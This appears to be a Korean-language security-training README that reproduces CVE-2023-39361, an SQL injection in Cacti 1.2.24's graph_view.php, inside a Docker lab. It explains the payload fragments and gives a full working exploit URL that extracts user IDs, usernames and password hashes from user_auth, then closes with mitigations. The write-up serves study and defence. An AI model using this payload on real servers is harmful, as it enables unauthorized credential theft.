### Cacti graph_view.php SQL Injection Leads to RCE [CVE-2023-39361]

> **[ WHS 3기 ] - [ 남기찬_7342 (ChoDeokCheol) ](https://github.com/ChoDeokCheol/CVE-2023-39361)**


<br/>


## 요약
 - Cacti 1.2.24 서버 내 `graph_view.php` 파일의 `grow_right_pane_tree` 함수에 취약점이 존재.
 - `action` 파라미터를 `tree_content`로 설정 시 사용자 입력값인 `rfilter` 파라미터가 존재.
 - `rfilter` 파라미터는 `html_validate_tree_vars` 함수를 통해 검증은 되지만 해당 검증은 단순히 유효한 **정규표현식인지 여부**만 검사한다.
 - 최종적으로 `rfilter` 값을 SQL 쿼리 내 끼워넣으며 **코드 삽입**이 가능함.
 - id, username 등 값을 뽑아낼 수 있음.(본 PoC에서 사용)

<br/>


## 사전 설정
- `docker-compose -v`를 통해 docker Compose 설치 유무와 버전 확인.
- CVE-2023-39361 구성에 필요한 도커 구성요소 준비.(yml or 이미지 등)

<br/>



## 환경 구성 및 실행
- vulhub 내 cacti/CVE-2023-39361/docker-compose.yml, entrypoint.sh를 사용.
- `docker compose up -d`를 통해 PoC 환경 구축. (이미지: cacti:1.2.24)
- yml 파일에 설정한 localhost 주소 8080:80으로 Cacti 서버 구축.
![도커 poc 환경구축](https://github.com/user-attachments/assets/99c93563-3207-403e-aa8e-dfb6765d00b3)
![cacti 서버 구축](https://github.com/user-attachments/assets/30ad3450-2091-42ad-8e7d-cbcdcdb93f28)


<br/>


## 취약점 PoC
- 해당 취약점은 인증 설정에서 일반 사용자(guest)도 graph를 확인할 수 있게 설정할 경우 발생한다.
- 해당 취약점은 다음과 같은 파라미터 입력으로 확인할 수 있다:


   - %20OR%20""="((" : 대표적인 SQL 인젝션 코드. OR을 통해 강제로 참 조건을 만족시킨다.
   - %20UNION%20SELECT% : 원하는 임의의 결과를 가져온다.
   - (select%20concat(id,0x23,username,0x23,password)%20from%20user_auth%20limit%201) : id#username#password 값을 요청한다.
   - (select%20user()),(select%20version()) : 데이터베이스 사용자 / 버전을 가져온다.
   - %23 : # 이므로 뒤의 SQL 문이 무력화된다.

>```http://your-ip:8080/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=aaaaaaa"%20OR%20""="(("))%20UNION%20SELECT%201,2,(select%20concat(id,0x23,username,0x23,password)%20from%20user_auth%20limit%201),4,5,6,(select%20user()),(select%20version()),9,10%23```

<br/>

## 결과
![burpsuite 실행 및 respond](https://github.com/user-attachments/assets/9f9f9de5-472a-4ee5-9e0e-546f7cb492a6)
요청한 대로 응답을 준 것을 확인할 수 있다.

<br/>

## 정리


SQL injection 공격은 서버 상호작용 중 유저 입력을 받아들이며 주로 발생한다. 해당 SQL injection 공격으로 데이터베이스 내부 기밀성이 침해되었으며, 자산이 유출되는 결과를 확인할 수 있었다. <br/>해당 SQL injection에 대한 조치로, rfilter에 기초적인 화이트리스트 값 검증을 체크하거나 (", ', ;, ...)같은 특수문자를 이스케이프 처리할 수 있다. 또는 DB 접근 시 Doctrine과 같은 ORM 라이브러리를 사용하는 식의 개선사항이 이루어질 수 있다.
